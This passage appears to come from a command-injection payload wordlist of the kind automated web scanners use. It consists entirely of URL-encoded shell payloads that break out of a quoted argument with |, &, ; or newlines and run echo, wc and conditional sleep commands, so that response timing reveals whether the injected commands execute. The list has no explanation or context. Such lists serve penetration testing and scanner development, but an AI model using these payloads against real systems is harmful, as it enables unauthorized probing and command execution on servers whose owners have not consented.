OCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%205%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%206%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%207%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%208%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%7C%20%5B%209%20-ne%20%24%28echo%20XOCDUH%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AGKSYR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%0A%20str%3D%24%28echo%20GZKCJA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20ZGYOBQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%252F%252F\n%27%7C%20%5B%201%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%202%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%203%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%204%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%205%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%206%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%207%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%208%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%7C%20%5B%209%20-ne%20%24%28echo%20IDQLWW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BODWQD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%0A%20str%3D%24%28echo%20FYHGFL%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20PUPQPK%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%27%7C%20%5B%201%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%202%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%203%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%204%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%205%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%206%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%207%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%208%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%7C%20%5B%209%20-ne%20%24%28echo%20UUMIWO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20DKKEQZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%3B%20str%3D%24%28echo%20GHEHAJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%27%7C%20%5B%201%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%202%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%203%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%204%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%205%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%206%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%207%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%208%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%7C%20%5B%209%20-ne%20%24%28echo%20JEORXY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20WGVBBV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%27%0A%20str%3D%24%28echo%20ROEZHE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi